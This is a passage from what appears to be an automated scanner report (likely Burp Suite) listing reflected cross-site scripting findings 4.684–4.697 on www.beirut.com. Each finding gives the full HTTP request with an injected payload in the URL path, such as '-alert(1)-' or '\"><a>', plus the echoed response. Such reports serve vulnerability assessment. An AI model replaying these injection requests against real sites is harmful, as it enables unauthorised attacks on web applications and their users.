Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreationsebbcf"><a>a25aa467a08">
...[SNIP]...

4.684. http://www.beirut.com/Recreations/Pool-Halls/2561106634 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Pool-Halls/2561106634

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d41ed'-alert(1)-'16e8bc12987 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations/Pool-Hallsd41ed'-alert(1)-'16e8bc12987/2561106634 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:32:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Recreations/Pool-Hallsd41ed'-alert(1)-'16e8bc12987';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.685. http://www.beirut.com/Recreations/Public-Beaches/075078389 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Recreations/Public-Beaches/075078389

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1139b"><a>464e78fe36b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreations1139b"><a>464e78fe36b/Public-Beaches/075078389 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:17:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreations1139b"><a>464e78fe36b">
...[SNIP]...

4.686. http://www.beirut.com/Recreations/Public-Beaches/075078389 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Public-Beaches/075078389

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72374'-alert(1)-'8cc1e2889f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations72374'-alert(1)-'8cc1e2889f7/Public-Beaches/075078389 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:24:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Recreations72374'-alert(1)-'8cc1e2889f7/Public-Beaches';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.687. http://www.beirut.com/Recreations/Public-Beaches/075078389 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Public-Beaches/075078389

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8bf2'-alert(1)-'11660c0128f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations/Public-Beachesf8bf2'-alert(1)-'11660c0128f/075078389 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:27:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Recreations/Public-Beachesf8bf2'-alert(1)-'11660c0128f';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.688. http://www.beirut.com/Recreations/Theme-Parks/4635732484 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Recreations/Theme-Parks/4635732484

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 862b4"><a>9de7a23f23e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreations862b4"><a>9de7a23f23e/Theme-Parks/4635732484 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:26:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreations862b4"><a>9de7a23f23e">
...[SNIP]...

4.689. http://www.beirut.com/Recreations/Theme-Parks/4635732484 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Theme-Parks/4635732484

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66b11'-alert(1)-'5992b4f4705 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations66b11'-alert(1)-'5992b4f4705/Theme-Parks/4635732484 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:33:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Recreations66b11'-alert(1)-'5992b4f4705/Theme-Parks';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.690. http://www.beirut.com/Recreations/Theme-Parks/4635732484 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Theme-Parks/4635732484

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44b2e'-alert(1)-'e333c5a2b0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations/Theme-Parks44b2e'-alert(1)-'e333c5a2b0d/4635732484 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:37:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Recreations/Theme-Parks44b2e'-alert(1)-'e333c5a2b0d';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.691. http://www.beirut.com/Recreations/Yacht-Clubs/6501142 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Recreations/Yacht-Clubs/6501142

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd8b2"><a>be498242f4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreationscd8b2"><a>be498242f4c/Yacht-Clubs/6501142 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:25:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreationscd8b2"><a>be498242f4c">
...[SNIP]...

4.692. http://www.beirut.com/Recreations/Yacht-Clubs/6501142 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Yacht-Clubs/6501142

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a2ad'-alert(1)-'9dd3216d5f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations1a2ad'-alert(1)-'9dd3216d5f7/Yacht-Clubs/6501142 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:32:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Recreations1a2ad'-alert(1)-'9dd3216d5f7/Yacht-Clubs';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.693. http://www.beirut.com/Recreations/Yacht-Clubs/6501142 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Yacht-Clubs/6501142

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 517a3'-alert(1)-'27fb9bcf2d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations/Yacht-Clubs517a3'-alert(1)-'27fb9bcf2d4/6501142 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:36:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Recreations/Yacht-Clubs517a3'-alert(1)-'27fb9bcf2d4';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.694. http://www.beirut.com/Recreations/Yoga-Centers/03053122 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Yoga-Centers/03053122

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cfec'-alert(1)-'ec6aa3a3888 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations9cfec'-alert(1)-'ec6aa3a3888/Yoga-Centers/03053122 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:42:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Recreations9cfec'-alert(1)-'ec6aa3a3888/Yoga-Centers';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.695. http://www.beirut.com/Recreations/Yoga-Centers/03053122 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Recreations/Yoga-Centers/03053122

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2df8d"><a>289183abcef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreations2df8d"><a>289183abcef/Yoga-Centers/03053122 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:35:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreations2df8d"><a>289183abcef">
...[SNIP]...

4.696. http://www.beirut.com/Recreations/Yoga-Centers/03053122 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Yoga-Centers/03053122

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d847'-alert(1)-'1fe4ea0fb8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations/Yoga-Centers5d847'-alert(1)-'1fe4ea0fb8c/03053122 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:48:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Recreations/Yoga-Centers5d847'-alert(1)-'1fe4ea0fb8c';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.697. http://www.beirut.com/Restaurants/Bakeries/6807482759 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Bakeries/6807482759

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bf65'-alert(1)-'772924dfe28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Restaurants4bf65'-alert(1)-'772924dfe28/Bakeries/6807482759 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
